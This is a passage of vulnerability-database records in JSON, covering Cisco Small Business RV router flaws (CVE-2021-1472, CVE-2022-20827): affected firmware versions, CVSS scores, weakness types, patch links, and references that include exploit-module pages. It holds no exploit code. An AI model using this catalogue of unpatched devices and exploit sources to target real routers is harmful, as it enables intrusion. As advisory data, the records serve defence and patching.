            "db": "NVD",
            "id": "CVE-2021-1472"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1472"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1472"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1472",
            "trust": 3.3
          },
          {
            "db": "PACKETSTORM",
            "id": "162238",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315",
            "trust": 0.8
          },
          {
            "db": "PACKETSTORM",
            "id": "165799",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.1172",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1472",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-1472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1472"
          }
        ]
      },
      "id": "VAR-202104-0893",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2024-11-23T21:58:41.960000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-sb-rv-bypass-inject-Rbhgvfdx",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-bypass-inject-Rbhgvfdx"
          },
          {
            "title": "Cisco Small Business RV Series Routers Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147015"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-sb-rv-bypass-inject-Rbhgvfdx"
          },
          {
            "title": "\u76ee\u5f55\nWindows\u751f\u4ea7\u529b\u63d0\u5347\uff08linux\u5316\uff09\nburpsuite2021.5.1\u4f7f\u7528\u65b9\u6cd5\nAcunetix Premium \uff08AWVS\uff09\u4f7f\u7528\u65b9\u6cd5\n\u4ee3\u7406\u8f6f\u4ef6\u4f7f\u7528\u65b9\u6cd5",
            "trust": 0.1,
            "url": "https://github.com/zmylml/yangzifun "
          },
          {
            "title": "Kenzer Templates [5170] [DEPRECATED]",
            "trust": 0.1,
            "url": "https://github.com/ARPSyndicate/kenzer-templates "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-1472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-287",
            "trust": 1.0
          },
          {
            "problemtype": "Buffer error (CWE-119) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1472"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-sb-rv-bypass-inject-rbhgvfdx"
          },
          {
            "trust": 1.8,
            "url": "http://seclists.org/fulldisclosure/2021/apr/39"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/162238/cisco-rv-authentication-bypass-code-execution.html"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1472"
          },
          {
            "trust": 0.6,
            "url": "https://packetstormsecurity.com/files/165799/cisco-small-business-rv-series-authentication-bypass-command-injection.html"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.1172"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/287.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv_series_authbypass_and_rce/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-1472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1472"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2021-1472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1472"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-08T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1472"
          },
          {
            "date": "2021-12-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "date": "2021-04-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          },
          {
            "date": "2021-04-08T04:15:13.687000",
            "db": "NVD",
            "id": "CVE-2021-1472"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1472"
          },
          {
            "date": "2021-12-10T09:10:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          },
          {
            "date": "2024-11-21T05:44:26.040000",
            "db": "NVD",
            "id": "CVE-2021-1472"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Buffer error vulnerability in series routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202208-0321

    Vulnerability from variot - Updated: 2024-08-14 14:10

    Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business Router products include OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within the wfapp application. A crafted server response can trigger execution of a system call composed from a attacker-supplied string. An attacker can leverage this vulnerability to execute code in the context of root. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202208-0321",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv345",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.26"
          },
          {
            "model": "rv260w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv340",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.26"
          },
          {
            "model": "rv340w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.26"
          },
          {
            "model": "rv160w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.26"
          },
          {
            "model": "rv160",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv160 vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn \u30eb\u30fc\u30bf with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340",
            "scope": null,
            "trust": 0.7,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20827"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Q. Kaiser from IoT Inspector Research Lab",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-1047"
          }
        ],
        "trust": 0.7
      },
      "cve": "CVE-2022-20827",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20827",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 9.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2022-20827",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 10.0,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-20827",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "ZDI",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2022-20827",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 0.7,
                "userInteraction": "NONE",
                "vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20827",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2022-20827",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20827",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "ZDI",
                "id": "CVE-2022-20827",
                "trust": 0.7,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202208-2168",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20827"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20827"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business Router products include OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Authentication is not required to exploit this vulnerability.The specific flaw exists within the wfapp application. A crafted server response can trigger execution of a system call composed from a attacker-supplied string. An attacker can leverage this vulnerability to execute code in the context of root. \nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. \nThis advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20827"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20827"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20827",
            "trust": 4.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15984",
            "trust": 0.7
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-1047",
            "trust": 0.7
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2022.3837",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2168",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20827",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20827"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20827"
          }
        ]
      },
      "id": "VAR-202208-0321",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2024-08-14T14:10:41.011000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-sb-mult-vuln-CbVp4SUR",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR"
          },
          {
            "title": "Cisco has issued an update to correct this vulnerability.",
            "trust": 0.7,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR"
          },
          {
            "title": "Cisco Small Business RV Series Routers Fixes for operating system command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=204185"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-sb-mult-vuln-CbVp4SUR"
          },
          {
            "title": "The Register",
            "trust": 0.1,
            "url": "https://www.theregister.co.uk/2022/08/05/cisco_smb_routers_critical_flaws/"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20827"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-120",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "OS Command injection (CWE-78) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20827"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-sb-mult-vuln-cbvp4sur"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20827"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2022.3837"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-20827/"
          },
          {
            "trust": 0.1,
            "url": "https://www.theregister.co.uk/2022/08/05/cisco_smb_routers_critical_flaws/"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20827"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20827"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20827"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20827"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-08-04T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "date": "2023-10-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "date": "2022-08-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          },
          {
            "date": "2022-08-10T09:15:08.537000",
            "db": "NVD",
            "id": "CVE-2022-20827"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-08-04T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "date": "2023-10-06T06:23:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "date": "2022-08-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          },
          {
            "date": "2023-11-07T03:43:04.223000",
            "db": "NVD",
            "id": "CVE-2022-20827"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0 In router products \u00a0OS\u00a0 Command injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202208-0323

    Vulnerability from variot - Updated: 2024-08-14 14:10

    Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. RV160 VPN router firmware, RV160W Wireless-AC VPN router firmware, RV260 VPN Multiple Cisco Systems products, including router firmware, contain vulnerabilities related to input validation.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
